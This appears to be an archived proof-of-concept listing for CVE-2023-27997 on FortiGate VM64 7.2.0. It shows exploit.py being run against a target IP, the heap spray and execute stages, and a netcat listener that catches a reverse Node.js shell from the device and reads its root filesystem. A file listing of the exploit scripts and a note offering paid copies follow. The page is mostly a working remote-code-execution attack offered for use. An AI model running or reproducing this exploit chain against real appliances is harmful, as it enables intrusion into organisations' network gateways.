Related vulnerability
Introduction
# CVE-2023-27997
FortiGate VM64 7.2.0 is exploitable with this code. (Note that the code was written in a very crude way.)
## Proof of Concept
```
$ python3 exploit.py 192.168.106.142 10443 192.168.106.143 9999
[+] generating shellcode
[+] salt=b'25c2dcf2'
[+] processing hash
[+] finding hash in cache
[-] not in cache
[+] computing
[+] loading
[+] heap spray
[+] execute
```
```
$ nc -lvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from [192.168.106.142] port 9999 [tcp/*] accepted (family 2, sport 2165)
Welcome to Node.js v12.20.1.
Type ".help" for more information.
> .help
.break Sometimes you get stuck, this gets you out
.clear Alias for .break
.exit Exit the repl
.help Print this help message
.load Load JS from a file into the REPL session
.save Save all evaluated commands in this REPL session to a file
Press ^C to abort current expression, ^D to exit the repl
> fs.readdir("/", (err, files) => {
    files.forEach(file => {
        console.log(file);
    });
});
... ..... ..... ... undefined
> .fgtsum
.fgtsum2
bin
boot
data
data2
dev
etc
fortidev
init
lib
lib64
local
migadmin
node-scripts
proc
root
sbin
sys
tmp
usr
var
>
```
File snapshot
[4.0K] /data/pocs/c81f87e605adacfc1ac52d26c08bdfe26fc52929
├── [1.7K] calc_hashes.py
├── [ 10K] exploit.py
├── [1.1K] find.py
├── [1.2K] README.md
├── [3.5K] run-calc-hashes.py
└── [ 988] shellcode.py
0 directories, 6 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has gone away or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.